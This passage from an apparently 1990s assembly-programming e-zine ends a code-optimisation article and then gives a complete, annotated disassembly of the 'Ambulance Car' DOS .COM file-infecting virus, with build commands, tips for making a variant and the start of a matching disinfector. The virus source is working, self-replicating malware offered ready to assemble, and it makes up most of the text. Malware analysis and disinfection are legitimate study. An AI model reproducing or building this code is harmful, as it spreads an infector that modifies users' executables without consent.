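for status in (0x00, 0xFF):               # AL returned by INT 21h, AH=0Bh
    al = (status + 3) & 0xFF              # ADD AL,3
    print(hex(status), "->", al, "PF =", parity_flag(al))
```

     So with no key AL=3 gives PF=1 and the loop continues, while a
keypress leaves AL=2 with PF=0, ready to become the video mode number.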


     While the code is optimised for size and for speed you may find that
it runs too quickly. This can be easily remedied by the addition of a wait
for vertical synchronisation loop (or vert sync as we techies call it).

     Just add the following after the generation calculating code (that
is after the instruction 'JC lopy'):-

         MOV DX,03DAh

lopv0:  IN AL,DX
         AND AL,8
         JNZ lopv0

lopv1:  IN AL,DX
         AND AL,8
         JZ lopv1

     Also if you add this the program size has changed. 'endofprog' is now
01ABh, so the number of 16-byte paragraphs to add to DS to get the start of
free space is now 01Bh. You must change the instruction at the beginning of
the code:-

         MOV AX,DS
**      ADD AX,01Bh             ;(OFFSET endofprog+0Fh>>4)=(1B) **
         MOV ES,AX
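
     The constant is just the end offset of the program rounded up to
a whole number of 16-byte paragraphs. A tiny Python calculator for it
follows; paragraphs_after is a name made up for this note, and the two
end offsets are the 156-byte figure and the 01ABh quoted in the text.

```python
def paragraphs_after(end_offset):
    """Number of 16-byte paragraphs to add to DS to clear the program."""
    return (end_offset + 0x0F) >> 4

print(hex(paragraphs_after(0x100 + 156)))  # original 156-byte program
print(hex(paragraphs_after(0x01AB)))       # end offset quoted for the vsync version
```

     If you change the program in any other way, recompute the value
from your own end offset rather than reusing either constant.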


     One final note: I use SCASW in this code to increment DI by two.
This is a well known space saving trick. However you must be wary since
it does not do just that; it also reads the word at ES:[DI] and sets the
flags from comparing it with AX. Generally this is fine but if DI=0FFFFh
the word straddles the end of the segment and we will get a general
protection fault.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                     'Ambulance Car' Disassembly
                                                     by Chili


This virus  definitely has  my  favourite  payload  of  all time.  I just  love
seeing that little  ambulance run  across the screen with  a 'siren' playing at
the same time.  Other than that, the virus itself isn't much of a thing.  Don't
forget though, that it dates back to at least 1990.

It is a non-resident  .COM infector,  and each time an  infected file is run it
will attempt to  infect  two files  (be it  in the  current  directory  or in a
directory  located in  the PATH)  in a parasitic  manner.  Infected files  will
experience a 796-byte  growth, being the main virus body appended to the end of
the host. Also the host file's date and time will be preserved. On occasion the
virus will display the 'ambulance car' payload.

The  virus doesn't  preserve the initial  contents of  AX and so  programs like
HotDIR fail to run when infected.  Also if there is any  reference to 'PATH' in
the environment block before  the actual PATH string the virus will assume that
to be the actual PATH (i.e. 'CLASSPATH=...').


Playing it safe
---------------
At the DOS prompt type "PATH ;" so that the virus will only infect files in the
current directory and you can keep track of things.  Also if all you want to do
is see the payload,  then comment the following lines in the source code (right
after the delta offset calculation) so that no files are infected:

                 call    search_n_infect
                 call    search_n_infect

Moreover you should comment the lines presented below (for the 'RedXAny' strain
look-alike) so that the payload is shown every time the virus is run.

In case  things start to  get out of hand,  you should do  one of three things:
either disinfect the files yourself with  a hex editor,  use the latest version
of F-PROT  (available from ftp.complex.is or through Simtel and Garbo)  to scan
and clean the infected files or use my own disinfector  (in another article) to
clean this specific strain.

[NOTE: F-PROT  will  report  the  strain  whose  source  code is  presented  as
        Ambulance.796.D]

Keep in mind that  this virus is not destructive,  so feel free to go ahead and
infect your entire computer (you really shouldn't do this,  since accidents can
sometimes happen!).


Strains
-------
A  'RedXAny'  strain look-alike  can be  obtained  by commenting  the following
lines (both in the 'payload' procedure):

                 jne     exit_payload            ;  (starting  with  the  sixth)

                 jnz     exit_payload            ;  don't show payload

[NOTE: This will not give you the actual 'RedXAny' strain, but one that behaves
        in the same manner - always shows the ambulance car]

Other strains exist,  but will not be  discussed here,  as  nothing of interest
would be added.


Compatibility
-------------
The virus runs ok  in a Win95 DOS box.  Also, remember that for the payload to
be appreciated in full, a PC Speaker is required. Bad luck for those of you who
don't have a computer with one...


Here is the disassembly:

--8<---------------------------------------------------------------------------

; Ambulance Car (aka Ambulance, RedX, Red Cross)
; Ambulance-B strain (or so it seems!)
; Disassembly by Chili for APJ #6
; Byte for byte match when assembled with TASM 4.1
; Assemble with:
;       tasm /ml /m2 ambul-b.asm
;       tlink /t ambul-b.obj


PSP_environment_seg     equ     2Ch     ; PSP location of process'  environment
                                         ;  block segment address

BDA_addr                equ     40h     ; BDA (Bios Data Area) segment address

BDA_LPT3_port_addr      equ     0Ch     ; BDA  location of  LPT3 I/O port  base
                                         ;  address
BDA_video_mode          equ     49h     ; BDA location of current video mode
BDA_timer_counter       equ     6Ch     ; BDA location of number of timer ticks
                                         ;  (18.2 per second) since midnight


_TEXT           segment word public 'code'
                 assume  cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT

                 org     100h

; Host and virus' main body
;--------------------------
ambulance_car   proc    far

; Jump over host to real beginning of virus

                 db      0E9h, 01h, 00h  ; Hardcoded relative near jump

; Host (missing the first 3 bytes)
;
; Dummy host is just 4 bytes so only a 'nop' here

host:
                 nop

; Calculate the delta offset
;
; This piece of code  will 'fool' some disassemblers and so it will  appear as:
;
;       call    $+4
;       add     [bp-7Fh], bx
;       out     dx, al
;       add     ax, [bx+di]
;
; Pretty basic, but could turn out to be somewhat annoying if used all over the
; place (for the person doing the disassembly, that is!)
;
; (because of 'db 01h';  used since  the near jump  above is also  3 bytes long
;  and that has to be taken into account for the displacement calculation)

real_start:
                 call    find_displacement
                 db      01h             ; Used to make this add up to 3 bytes
find_displacement:
                 pop     si
                 sub     si, offset host

; Infect twice then load up the payload

                 call    search_n_infect
                 call    search_n_infect
                 call    payload

; Restore host's original first 3 bytes

                 lea     bx, [si+original_3bytes-4]
                 mov     di, offset ambulance_car
                 mov     al, [bx]
                 mov     [di], al        ; Restore 1st byte
                 mov     ax, [bx+1]
                 mov     [di+1], ax      ; Restore 2nd and 3rd bytes

; Return control to host

                 jmp     di

; Move on to next step (be it 'search_n_infect' or 'payload')

next_step:
                 retn

ambulance_car   endp


; Search for a file and infect it
;--------------------------------
search_n_infect proc    near

; Search for the file

                 call    search

; Found any file?

                 mov     al, byte ptr [si+file_mask-4]
                 or      al, al                  ; If not,  then move  on to the
                 jz      next_step               ;  next step

; Increase 'opened files' counter

                 lea     bx, [si+counter-4]
                 inc     word ptr [bx]

; Open file in read/write mode (AL - 02h)

                 lea     dx, [si+filename-4]     ; Open a File
                 mov     ax, 3D02h               ;  [on entry AL  -  Open  mode;
                 int     21h                     ;   DS:DX - Pointer to filename
                                                 ;   (ASCIIZ string)]
                                                 ;  [returns AX - File handle]

; Save file handle

                 mov     word ptr [si+file_handle-4], ax

; Read file's first 3 bytes

                 mov     bx, word ptr [si+file_handle-4]
                 mov     cx, 3                   ; Read  from  File  or  Device,
                 lea     dx, [si+first_3bytes-4] ;  Using a Handle
                 mov     ah, 3Fh                 ;  [on entry BX -  File handle;
                 int     21h                     ;   CX  -  Number  of bytes  to
                                                 ;   read;  DS:DX  -  Address of
                                                 ;   buffer]

; Check if already infected

                 mov     al, byte ptr [si+first_3bytes-4]
                 cmp     al, 0E9h                ; Is first byte a near jump?
                 jne     infect                  ; If not,  assume  virus  isn't
                                                 ;  here, so go ahead and infect

; Move file pointer to real virus start (pointed to by the initial near jump)

                 mov     dx, word ptr [si+first_3bytes+1-4]
                 mov     bx, word ptr [si+file_handle-4]
                 add     dx, 3                   ; Add  3 bytes  to account  for
                                                 ;  the near jump
                 xor     cx, cx                  ; Move File Pointer (LSEEK)
                 mov     ax, 4200h               ;  [on entry BX -  File handle;
                 int     21h                     ;   CX:DX -  Offset,  in bytes;
                                                 ;   AL   -   Mode  code  ( Move
                                                 ;   pointer  CX:DX  bytes  from
                                                 ;   beginning of file, AL - 0)]

; Read first 6 bytes from that location

                 mov     bx, word ptr [si+file_handle-4]
                 mov     cx, 6
                 lea     dx, [si+six_bytes-4]
                 mov     ah, 3Fh                 ; Read  from  File  or  Device,
                 int     21h                     ;  Using a Handle

; Double-check if already infected
;
; Compares the bytes read  with the first part of the  displacement calculation
;  code

                 mov     ax, word ptr [si+six_bytes-4]
                 mov     bx, word ptr [si+six_bytes+2-4]
                 mov     cx, word ptr [si+six_bytes+4-4]
                 cmp     ax, word ptr [si+ambulance_car]
                 jne     infect
                 cmp     bx, word ptr [si+ambulance_car+2]
                 jne     infect
                 cmp     cx, word ptr [si+ambulance_car+4]
                 je      close_file              ; If already infected,  then go
                                                 ;  ahead and close the file

infect:

; Reset file pointer to end of file (AL - 2)

                 mov     bx, word ptr [si+file_handle-4]
                 xor     cx, cx
                 xor     dx, dx                  ; Move File Pointer (LSEEK)
                 mov     ax, 4202h               ;  [returns DX:AX - New pointer
                 int     21h                     ;   location]

; Calculate virus' near jump relative offset

                 sub     ax, 3                   ; Account for the near jump
                 mov     word ptr [si+relative_offset-4], ax

; Get and save file's date and time (AL - 0)

                 mov     bx, word ptr [si+file_handle-4]
                 mov     ax, 5700h               ; Get a File's Date and Time
                 int     21h                     ;  [on entry BX - File handle]
                 push    cx                      ;  [returns  CX  -  Time;  DX -
                 push    dx                      ;   Date]

; Write virus body to end of file

                 mov     bx, word ptr [si+file_handle-4]
                 mov     cx, virus_body - real_start
                 lea     dx, [si+ambulance_car]  ; Write to  a File  or  Device,
                 mov     ah, 40h                 ;  Using a Handle
                 int     21h                     ;  [on entry BX  - File handle;
                                                 ;   CX  -  Number  of  bytes to
                                                 ;   write;  DS:DX  - Address of
                                                 ;   buffer]

; Write host's first 3 bytes to after virus body

                 mov     bx, word ptr [si+file_handle-4]
                 mov     cx, 3
                 lea     dx, [si+first_3bytes-4]
                 mov     ah, 40h                 ; Write to  a File  or  Device,
                 int     21h                     ;  Using a Handle

; Move file pointer to beginning of file

                 mov     bx, word ptr [si+file_handle-4]
                 xor     cx, cx
                 xor     dx, dx
                 mov     ax, 4200h               ; Move File Pointer (LSEEK)
                 int     21h

; Write jump-to-virus-body code to beginning of file

                 mov     bx, word ptr [si+file_handle-4]
                 mov     cx, 3
                 lea     dx, [si+jump_code-4]
                 mov     ah, 40h                 ; Write to  a File  or  Device,
                 int     21h                     ;  Using a Handle

; Reset file's date and time to previous (AL - 1)

                 pop     dx
                 pop     cx
                 mov     bx, word ptr [si+file_handle-4]
                 mov     ax, 5701h               ; Set a File's Date and Time
                 int     21h                     ;  [on entry BX  - File handle;
                                                 ;   CX - Time; DX - Date]

close_file:
                 mov     bx, word ptr [si+file_handle-4]
                 mov     ah, 3Eh                 ; Close a File Handle
                 int     21h                     ;  [on entry BX - File handle]

                 retn

search_n_infect endp


; Find a file to infect, in the PATH or in the current directory
;---------------------------------------------------------------
search          proc    near

                 mov     ax, ds:PSP_environment_seg
                 mov     es, ax

                 push    ds
                 mov     ax, BDA_addr
                 mov     ds, ax
                 mov     bp, ds:BDA_timer_counter
                 pop     ds

; Where to infect
;
; Probability of  infecting in the  current directory  (none of  the first  two
;  lower bits of BP being set) is 1/4 (25%),  while probability of searching in
;  the PATH for a directory where to infect (one or both of the first two lower
;  bits of BP being set) is 3/4 (75%)

                 test    bp, 00000011b           ; Check if we are  to infect in
                 jz      check_cur_dir           ;  the current  directory or in
                                                 ;  a PATH directory

; Find the PATH string in the environment block
;
; Format of environment block (from Ralf Brown's Interrupt List):
;
; Offset  Size    Description
; ------  ----    -----------
; 00h     N BYTEs first environment variable, ASCIIZ string of form "var=value"
;         N BYTEs second environment variable, ASCIIZ string
;           ...
;         N BYTEs last environment variable, ASCIIZ string of form "var=value"
;           BYTE  00h
;---DOS 3.0+ ---
;           WORD  number of strings following environment (normally 1)
;         N BYTEs ASCIIZ full pathname of program owning this environment
;                 (other strings may follow)

                 xor     bx, bx                  ; Point to the first character
check_if_PATH:
                 mov     ax, es:[bx]
                 cmp     ax, 'AP'
                 jne     not_PATH
                 cmp     word ptr es:[bx+2], 'HT'
                 je      PATH_found
not_PATH:
                 inc     bx
                 or      ax, ax                  ; Check if both  AH and AL  are
                 jnz     check_if_PATH           ;  equal  to zero  (meaning the
                                                 ;  standard  environment  block
                                                 ;  is over)

; Setup to check in the current directory

check_cur_dir:
                 lea     di, [si+file_mask-4]    ; Point to file mask holder
                 jmp     short find_file

; Find a directory in the PATH

PATH_found:
                 add     bx, 5                   ; Point to after 'PATH='

find_dir:
                 lea     di, [si+pathname-4]     ; Point to PATH name holder

get_character:
                 mov     al, es:[bx]
                 inc     bx
                 or      al, al                  ; Are  we  at the  end of  this
                 jz      patch_dir               ;  PATH string?

                 cmp     al, ';'                 ; Is  this  a  PATH   directory
                 je      check_if_this_one       ;  separator?

                 mov     [di], al                ; Write this  character  to the
                 inc     di                      ;  PATH name holder
                 jmp     short get_character

check_if_this_one:
                 cmp     byte ptr es:[bx], 0     ; Are  we  at the  end of  this
                 je      patch_dir               ;  PATH string?

                 shr     bp, 1                   ; Get  rid  of  the  first  two
                 shr     bp, 1                   ;  lower  bits,   because  it's
                                                 ;  already known that  at least
                                                 ;  one of them is set

; Which directory to choose
;
; Probability of  infecting in the found directory  (none of  the first  two
;  lower bits of BP being set) is 1/4 (25%),  while probability of searching in
;  the PATH for another directory where to infect (one or both of the first two
;  lower bits of BP being set) is 3/4 (75%)

                 test    bp, 00000011b           ; Check if we are to search for
                 jnz     find_dir                ;  files in this directory or
                                                 ;  not

patch_dir:
                 cmp     byte ptr [di-1], '\'    ; Does  the  directory  already
                 je      find_file               ;  have an ending '\'?

                 mov     byte ptr [di], '\'      ; If not, then add one
                 inc     di

; Find a file to infect

find_file:
                 push    ds
                 pop     es
                 mov     [si+filename_ptr-4], di ; Save current  location within
                                                 ;  the pathname/file_mask

                 mov     ax, '.*'                ; Set file mask
                 stosw
                 mov     ax, 'OC'
                 stosw
                 mov     ax, 'M'
                 stosw

                 push    es
                 mov     ah, 2Fh                 ; Get   Disk  Transfer  Address
                 int     21h                     ;  (DTA)
                                                 ;  [returns ES:BX -  Address of
                                                 ;   current DTA]

                 mov     ax, es
                 mov     word ptr [si+DTA_seg-4], ax     ; Save DTA segment
                 mov     word ptr [si+DTA_off-4], bx     ; Save DTA offset
                 pop     es

                 lea     dx, [si+new_DTA-4]      ; Setup new DTA

                 mov     ah, 1Ah                 ; Set Disk Transfer Address
                 int     21h                     ;  [on entry DS:DX - Address of
                                                 ;   DTA]

                 lea     dx, [si+file_mask-4]    ; Setup  file  mask   (with  or
                                                 ;  without a PATH directory)
                 xor     cx, cx                  ; Search for normal files only

                 mov     ah, 4Eh                 ; Find First Matching File
                 int     21h                     ;  [on   entry   CX   -    File
                                                 ;   attribute; DS:DX -  pointer
                                                 ;   to filespec (ASCIIZ string)]

                 jnc     file_found              ; File found? (and no errors?)

; If no file found, then clear the file mask

                 xor     ax, ax
                 mov     word ptr [si+file_mask-4], ax
                 jmp     short restore_DTA

; Check if we are to infect this file or find another one
;
; Probability of  keeping the found  file is 1/8 (12.5%)  while probability  of
;  searching for another one is 7/8 (87.5%)

file_found:
                 push    ds
                 mov     ax, BDA_addr
                 mov     ds, ax

                 ror     bp, 1
                 xor     bp, ds:BDA_timer_counter
                 pop     ds

                 test    bp, 00000111b
                 jz      file_picked             ; Keep this file?
                                                 ; If not, then...

                 mov     ah, 4Fh                 ; Find Next Matching File
                 int     21h

                 jnc     file_found              ; File found? (and no errors?)

; Either a file was picked or no more files were found (so keep last one)

file_picked:
                 mov     di, [si+filename_ptr-4] ; Point to after path, if any
                 lea     bx, [si+f_name-4]

; Copy the file name of the found file to our filename/pathname holder

store_filename:
                 mov     al, [bx]
                 inc     bx
                 stosb
                 or      al, al                  ; Is the file name over?
                 jnz     store_filename          ; If not,  then copy  the  next
                                                 ;  character

restore_DTA:
                 mov     bx, word ptr [si+DTA_off-4]     ; Get old DTA offset
                 mov     ax, word ptr [si+DTA_seg-4]     ; Get old DTA segment
                 push    ds
                 mov     ds, ax
                 mov     ah, 1Ah                 ; Set Disk Transfer Address
                 int     21h
                 pop     ds

                 retn

search          endp


; Check if payload will be shown or not
;--------------------------------------
payload         proc    near

; Check if payload will be shown
;
; The  payload  will  be shown  only  when the  counter-of-opened-files matches
;  ...x110 (in binary)  which happens at:  6, 14, 22, 30, 38, ... 65534.  Then,
;  when the counter reaches its limit (65535) and goes back to zero, everything
;  starts again. So probability of the payload being shown is 1/8 (12.5%) and
;  of not is 7/8 (87.5%)

                 push    es
                 mov     ax, word ptr [si+counter-4]
                 and     ax, 00000111b
                 cmp     ax, 00000110b           ; Show  payload   every   eight
                 jne     exit_payload            ;  (starting  with  the  sixth)
                                                 ;  time

; Did we already show the payload? (since the computer was (re)booted)

                 mov     ax, BDA_addr
                 mov     es, ax
                 mov     ax, es:BDA_LPT3_port_addr
                 or      ax, ax                  ; If the  LPT3 port  is in use,
                 jnz     exit_payload            ;  don't show payload

; Mark LPT3 port as in use, so that the payload won't be shown again

                 inc     word ptr es:BDA_LPT3_port_addr
                 call    show_payload

exit_payload:
                 pop     es

                 retn

payload         endp


; Setup and show the 'ambulance car' payload
;-------------------------------------------
show_payload    proc    near

; Check video mode
;
; Text mode 3 (80x25) - video buffer address = 0B800h
; Text mode 7 (80x25) - video buffer address = 0B000h

                 push    ds
                 mov     di, 0B800h
                 mov     ax, BDA_addr
                 mov     ds, ax
                 mov     al, ds:BDA_video_mode
                 cmp     al, 7                   ; Check which  video mode we're
                 jne     setup_video_n_tune      ;  on,  if not  Monochrome text
                 mov     di, 0B000h              ;  mode 7, assume mode 3

setup_video_n_tune:
                 mov     es, di
                 pop     ds
                 mov     bp, 0FFF0h              ; Setup number of tones to play
                                                 ;  (will increment up to 50h)

setup_animation:
                 mov     dx, 0                   ; Setup ambulance_data column
                 mov     cx, 16                  ; Number of characters that make
                                                 ;  up one ambulance_data line

do_ambulance:
                 call    show_ambulance          ; Print the ambulance to screen
                 inc     dx
                 loop    do_ambulance

                 call    play_siren              ; Play  a tone  of the  'siren'
                 call    wait_tick               ;  and wait for a tick

                 inc     bp
                 cmp     bp, 50h                 ; Already played the 'ambulance
                 jne     setup_animation         ;  siren' tune 12 times?

                 call    speaker_off             ; If yes, then turn speaker off
                 push    ds
                 pop     es

                 retn

show_payload    endp


; Turn the PC speaker off
;------------------------
speaker_off     proc    near

; Turn off the speaker
;
; 8255 PPI - Programmable Peripheral Interface
; Port 61h, 8255 Port B output
;
; (see description below)

                 in      al, 61h
                 and     al, 11111100b   ; Disable timer channel 2 and  'ungate'
                 out     61h, al         ;  its output to the speaker

                 retn

speaker_off     endp


; Turn on the speaker and play the "ambulance siren" sound
;------------------------------------------------------------
play_siren      proc    near

; Select tone frequency to generate
;
; Tone frequency is selected by means of the 3rd least significant bit of BP:
;
; Bit(s)                        Description
; ------                        -----------
; ... 3 2 1 0
; ... x 0 x x                   Play 1st tone frequency
; ... x 1 x x                   Play 2nd tone frequency
;
; If we consider A to be  the 1st tone and B to be  the 2nd tone then the whole
;  'ambulance siren' tune will be: (AAAABBBB) x 12

                 mov     dx, 07D0h       ; "ambulance siren" 1st tone frequency
                 test    bp, 00000100b   ; Check if  we are  to play
                 jz      speaker_on      ;  the first or  the second
                                         ;  tone frequency
                 mov     dx, 0BB8h       ; "ambulance siren" 2nd tone frequency

; Turn on the speaker
;
; 8255 PPI - Programmable Peripheral Interface
; Port 61h, 8255 Port B output
;
; Bit(s)                        Description
; ------                        -----------
; 7 6 5 4 3 2 1 0
; . . . . . . . 1               Timer 2 gate to speaker enable
; . . . . . . 1 .               Speaker data enable
; x x x x x x . .               Other non-concerning fields

speaker_on:
                 in      al, 61h
                 test    al, 00000011b   ; If speaker is already on, then go and
                 jnz     play_tone       ;  play the sound tone
                 or      al, 00000011b   ; Else,  enable  timer  channel  2  and
                 out     61h, al         ; 'gate' its output to the speaker

; Program the PIT
;
; 8253 PIT - Programmable Interval Timer
; Port 43h, 8253 Mode Control Register
;
; Bit(s)                        Description
; ------                        -----------
; 7 6 5 4 3 2 1 0
; . . . . . . . 0               16-bit binary counter
; . . . . 0 1 1 .               Mode 3, square wave generator
; . . 1 1 . . . .               Read/Write LSB, followed by write of MSB
; 1 0 . . . . . .               Select counter (channel) 2

                 mov     al, 10110110b   ; Set 8253 command register
                 out     43h, al         ;  for mode 3, channel 2, etc

; Generate a tone from the speaker
;
; 8253 PIT - Programmable Interval Timer
; Port 42h, 8253 Counter 2 Cassette and Speaker Functions

play_tone:
                 mov     ax, dx
                 out     42h, al         ; Send LSB (Least Significant Byte)
                 mov     al, ah
                 out     42h, al         ; Send MSB (Most Significant Byte)

                 retn

play_siren      endp


; Show the 'ambulance car'
;-------------------------
show_ambulance  proc    near

                 push    cx
                 push    dx

                 lea     bx, [si+ambulance_data-4]
                 add     bx, dx          ; Setup  which   ambulance_data  column
                                         ; we're going to print

                 add     dx, bp          ; Don't show the ambulance_data columns
                 or      dx, dx          ;  which aren't still visible
                 js      ambulance_done

                 cmp     dx, 50h         ; Check if the column we're printing is
                 jae     ambulance_done  ;  past the screen limit
                                         ; If yes,  then don't print it

                 mov     di, 3200        ; Point to  beginning of  screen's 21st
                                         ;  line (3200 / 160 bytes per line)

                 add     di, dx          ; Point to the column we're supposed to
                 add     di, dx          ;  be printing at

                 sub     dx, bp          ; Restore to initial column value

                 mov     cx, 5           ; Set it up so we're in the first line

decode_character:
                 mov     ah, 7           ; Set color attribute to white

; Decode the character
;
; It's really pretty ingenious, each character is encoded in a way, so that for
;  each line beyond the first one that  character is incremented by one and for
;  each column  beyond the  first the  same thing happens.  Taking  that  into
;  account it's not difficult to  understand how it all works and how to decode
;  the ambulance_data

                 mov     al, [bx]        ; Get the character
                 sub     al, 7
                 add     al, cl          ; Account for which line we're in
                 sub     al, dl          ; Account for which column we're in

                 cmp     cx, 5           ; Are we in the first line?
                 jne     print_character ; If we are, then...

                 mov     ah, 15          ; Set color attribute to high-intensity
                                         ;  white

                 test    bp, 00000011b   ; Is this the first tone of an AAAA or
                                         ;  BBBB tune sequence?
                 jz      print_character ; If yes, then go ahead  and print the
                                         ;  'siren' characters

                 mov     al, ' '         ; Else,  replace  them  with a ' '  (to
                                         ;  accomplish the visual 'siren' effect)

print_character:
                 stosw                   ; Print the character to screen
                 add     bx, 16          ; Point to next  ambulance_data line
                 add     di, 158         ; Point to next screen line
                 loop    decode_character

ambulance_done:
                 pop     dx
                 pop     cx

                 retn

show_ambulance  endp


; Wait for one tick (18.2 per second) to pass
;--------------------------------------------
wait_tick       proc    near

                 push    ds
                 mov     ax, BDA_addr
                 mov     ds, ax
                 mov     ax, ds:BDA_timer_counter    ; Get ticks since midnight
check_timer:
                 cmp     ax, ds:BDA_timer_counter    ; Check  if  one  tick  has
                 je      check_timer                 ;  already passed
                 pop     ds

                 retn

wait_tick       endp


;--- Data from here below

ambulance_data:
    first_line   db      22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 66h, 87h, 3Bh
                 db      2Dh, 2Eh, 2Fh, 30h, 31h
    second_line  db      23h, 0E0h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E6h, 0E7h
                 db      0E7h, 0E9h, 0EAh, 0EBh, 30h, 31h, 32h
    third_line   db      24h, 0E0h, 0E1h, 0E2h, 0E3h, 0E8h, 2Ah, 0EAh, 0E7h
                 db      0E8h, 0E9h, 2Fh, 30h, 6Dh, 32h, 33h
    fourth_line  db      25h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E7h, 0E7h, 0E8h
                 db      0E9h, 0EAh, 0EBh, 0ECh, 0EDh, 0EEh, 0EFh
    fifth_line   db      26h, 0E6h, 0E7h, 29h, 59h, 5Ah, 2Ch, 0ECh, 0EDh, 0EEh
                 db      0EFh, 0F0h, 32h, 62h, 34h, 0F4h

; Here's how the ambulance looks - see under DOS (box):
;
;        \|/
; ÜÜÜÜÜÜÜÜÛÜÜÜ
; ÛÛÛÛß ßÛÛÛ  \
; ÛÛÛÛÛÜÛÛÛÛÛÛÛÛÛ
; ßß OO ßßßßß O ß

counter         dw      9

jump_code:
near_jump       db      0E9h
relative_offset db      36h, 00h

first_3bytes    db      3      dup     (?)

file_handle     dw      ?

virus_body:

original_3bytes db      0CDh, 20h               ; 'int 20h' opcode
                 db      90h                     ; 'nop' opcode


;--- Stuff that gets saved along with the virus ends here

six_bytes       db      6       dup     (?)

filename_ptr    dw      ?

DTA_seg         dw      ?
DTA_off         dw      ?

file_mask:
filename:
pathname        db      6       dup     (?)
                 db      7       dup     (?)
                 db      67      dup     (?)

new_DTA:
    reserv       db      21      dup     (?)
    f_attr       db      ?
    f_time       dw      ?
    f_date       dw      ?
    f_size       dd      ?
    f_name       db      13      dup     (?)
    filler       db      85      dup     (?)


_TEXT           ends
                 end     ambulance_car
---------------------------------------------------------------------------8<--
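
The payload arithmetic can be checked outside of DOS. What follows is only a
sketch in Python and is not part of the original listing: the function names
are made up for illustration and the PIT input clock of 1,193,182 Hz is an
assumption (the usual PC value). The data bytes, the decode arithmetic
(byte - 7 + CL - DL) and the two divisors (07D0h and 0BB8h) are copied from
the listing above.

```python
# Sketch only: mirrors 'decode_character' and the divisors of 'play_siren'.
# Names are hypothetical; the bytes are copied from 'ambulance_data'.

AMBULANCE_DATA = [
    bytes.fromhex("22 23 24 25 26 27 28 29 66 87 3B 2D 2E 2F 30 31"),
    bytes.fromhex("23 E0 E1 E2 E3 E4 E5 E6 E7 E7 E9 EA EB 30 31 32"),
    bytes.fromhex("24 E0 E1 E2 E3 E8 2A EA E7 E8 E9 2F 30 6D 32 33"),
    bytes.fromhex("25 E1 E2 E3 E4 E5 E7 E7 E8 E9 EA EB EC ED EE EF"),
    bytes.fromhex("26 E6 E7 29 59 5A 2C EC ED EE EF F0 32 62 34 F4"),
]

PIT_CLOCK_HZ = 1193182  # assumption: standard PC 8253 input clock


def decode_ambulance(rows):
    """Undo the per-line and per-column increments.

    The listing computes al = byte - 7 + cl - dl, where cl runs from 5
    (first line) down to 1 (fifth line) and dl is the column (0..15).
    """
    lines = []
    for row_index, row in enumerate(rows):
        cl = 5 - row_index
        raw = bytes((b - 7 + cl - col) & 0xFF for col, b in enumerate(row))
        lines.append(raw.decode("cp437"))  # DOS code page, block characters
    return lines


def tone_hz(divisor):
    """Frequency produced by PIT channel 2 for a given 16-bit divisor."""
    return PIT_CLOCK_HZ / divisor


if __name__ == "__main__":
    for line in decode_ambulance(AMBULANCE_DATA):
        print(line)
    print(round(tone_hz(0x07D0), 1), "Hz and", round(tone_hz(0x0BB8), 1), "Hz")
```

Under these assumptions the five decoded lines are 16 characters wide each
and the two siren tones come out at roughly 597 Hz and 398 Hz.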


Special Thanks
--------------
I would like to thank Cicatrix for sending me his collection of 'Ambulance Car'
strains, so that I would have more than two variants to study and compare.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                     'Ambulance Car' Disinfector
                                                     by Chili


Since  I  provided a  ready-to-be-assembled  virus  in  the   "'Ambulance  Car'
Disassembly"  article,  I decided to  also write a bonus  article with  a basic
disinfector for it.  Please note that this disinfector doesn't locate and clean
all existing 'Ambulance Car' strains,  though it does work on more than half of
the  strains I have  (thanks Cicatrix).  It is only  intended to work  with the
strain I provided,  so no assurances are given as to whether it will do the job
or not with other strains  (it also works with the  'RedXAny' strain look-alike
and with the tamed version that only displays the payload -  this tamed version
really isn't a virus since  it doesn't replicate and so F-PROT won't report it;
the disinfector does report and clean it though).

An infected file  can easily be cleaned by hand,  so you should try that first.
The disinfector  will scan all .COM files  in the current  directory for  three
things:  1.  the '0E9h' near jump code  (other strains may have the '0EBh' jump
code  -  this won't  detect them!);  2.  the delta  offset calculation  routine
pointed to by the near jump;  3. the ambulance data at the end of the virus (if
you change  this into something  else the disinfector will  report this file as
suspicious). Upon a suspicious or infected file report the user will be given a
chance to clean it or continue on to the next file.
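
The three checks can also be written down compactly. The Python sketch below
works on a file image held in memory and is not the disinfector itself: the
names 'classify' and 'disinfect' are hypothetical, and treating a file shorter
than 15 bytes as merely suspicious is a simplification. The signature bytes
are the ones the disinfector compares against (01E8h, 0100h, 815Eh, 0EEh and
0F434h, stored little-endian).

```python
# Sketch only: same checks as the disinfector, on an in-memory .COM image.
# Function names are hypothetical.

DELTA_CODE = bytes([0xE8, 0x01, 0x00, 0x01, 0x5E, 0x81, 0xEE])
AMBULANCE_TAIL = bytes([0x34, 0xF4])


def jump_target(image):
    """File offset the initial near jump points to (16-bit wrap-around)."""
    return (int.from_bytes(image[1:3], "little") + 3) & 0xFFFF


def classify(image):
    """Return 'clean', 'suspicious' or 'infected' for a .COM file image."""
    if len(image) < 3 or image[0] != 0xE9:
        return "clean"                  # 1. no 0E9h near jump at the start
    target = jump_target(image)
    if image[target:target + 7] != DELTA_CODE:
        return "clean"                  # 2. no delta offset calculation code
    tail = image[-15:-13] if len(image) >= 15 else b""
    if tail == AMBULANCE_TAIL:
        return "infected"               # 3. ambulance data is where expected
    return "suspicious"


def disinfect(image):
    """Put back the host's first 3 bytes (kept as the last 3 bytes of the
    file) and cut the file at the offset the jump points to."""
    return image[-3:] + image[3:jump_target(image)]
```

A caller would run 'classify' first and only call 'disinfect' on an image
reported as infected (or, at the user's own risk, suspicious).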

And here is the disinfector:

[NOTE: F-PROT will  report this  as a new or modified  variant of SillyC  -  go
        figure!]

--8<---------------------------------------------------------------------------

; 'Ambulance Car' Disinfector
; KILLREDX by Chili for APJ #6
; Assemble with (TASM 4.1):
;       tasm /ml /m2 killredx.asm
;       tlink /t killredx.obj


LF              equ     0Ah             ; 'Line Feed' ASCII code
CR              equ     0Dh             ; 'Carriage Return' ASCII code


_TEXT           segment word public 'code'
                 assume  cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT

                 org     100h

killredx        proc    far

;--- Print program identification message

